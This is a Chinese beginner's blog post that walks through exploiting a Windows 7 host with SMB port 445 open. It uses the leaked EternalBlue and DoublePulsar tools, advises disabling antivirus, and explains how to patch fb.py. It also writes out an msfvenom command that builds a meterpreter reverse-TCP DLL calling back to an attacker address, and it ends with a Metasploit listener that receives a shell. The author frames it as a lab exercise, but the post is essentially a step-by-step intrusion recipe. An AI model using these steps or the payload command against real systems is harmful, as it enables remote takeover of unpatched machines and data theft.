小白实验 Widows SMB 0day

本文介绍如何使用Python工具针对开放445端口的Windows 7系统进行攻击,包括环境搭建、工具下载、攻击步骤等。通过EternalBlue和Doublepulsar模块实现远程控制。
部署运行你感兴趣的模型镜像

靶机:Windows7  445端口开放

废话不多说,开始小白的探索之路。。

         大家可以先到https://github.com/x0rz/EQGRP_Lost_in_Translation/tree/master/windows上去下载工具,下载完后解压到某个文件夹(当然你可以适当的禁止一些杀毒软件)。

         首先要对自己的电脑进行Python环境的设置,我也是看别人实验的过程,首先下载python2.6或python3.2版本(注意应当下32位的,不然后面好像会出错),因为我下的是Python2.6版本的,下面就以这个版本进行说明。可以在https://www.python.org/downloads/进行下载,我那时选的是2.6.4版本的,其他的应当都可以,下载好后,还要进行路径的配置,这个网上一搜一大堆,就不说了。接下来还要下载pywin32,可以参考http://jingyan.baidu.com/article/22fe7ced1ca36b3003617f7a.html进行下载安装(我是直接下载他红线框标的下面2.6的那个可以用),完成环境的配置后,进入到解压的文件夹,然后进入\windows这个目录下找到fb.py这个文件,将26,27,28,72行注释掉。

 

 

                

注释完以后,打开cmd,进入到fb.py文件的位置用python2.6运行文件。(之前应关闭相应的杀毒软件。。)

这一切都完成后,并且正确后应如下图所示

 

接下来按他要求的进行输入

 

 一路回车,然后使用use Eternalblue

一路回车,下图中的那个选择1

 

一路回车出现下图则表示这个模块使用成功

输入 use Doublepulsar

一路回车,选择目标机的版本


如下图所选,那个s.dll是在kail中用msf生成的一个dll文件(下面是怎样生成的),我这里是复制到E盘根目录下

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.4.115.189 lport=5555 -f dll > s.dll(要先进入‘/’目录下及cd /)


用kail中的metasploit进行相关的配置开始监听

回到cmd,一路回车,如下为成功

kail中返回一个shell

help一下,发现有很多功能。。。

screenshot截一下图

以上就是小白在机房实验的全过程。。。

大家还可以自己探索更多的功能。

以下两个网页供大家参考

http://www.myhack58.com/Article/60/63/2017/85384_2.htm

http://www.qingpingshan.com/pc/aq/253048.html

 

您可能感兴趣的与本文相关的镜像

Python3.11

Python3.11

Conda
Python

Python 是一种高级、解释型、通用的编程语言,以其简洁易读的语法而闻名,适用于广泛的应用,包括Web开发、数据分析、人工智能和自动化脚本

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值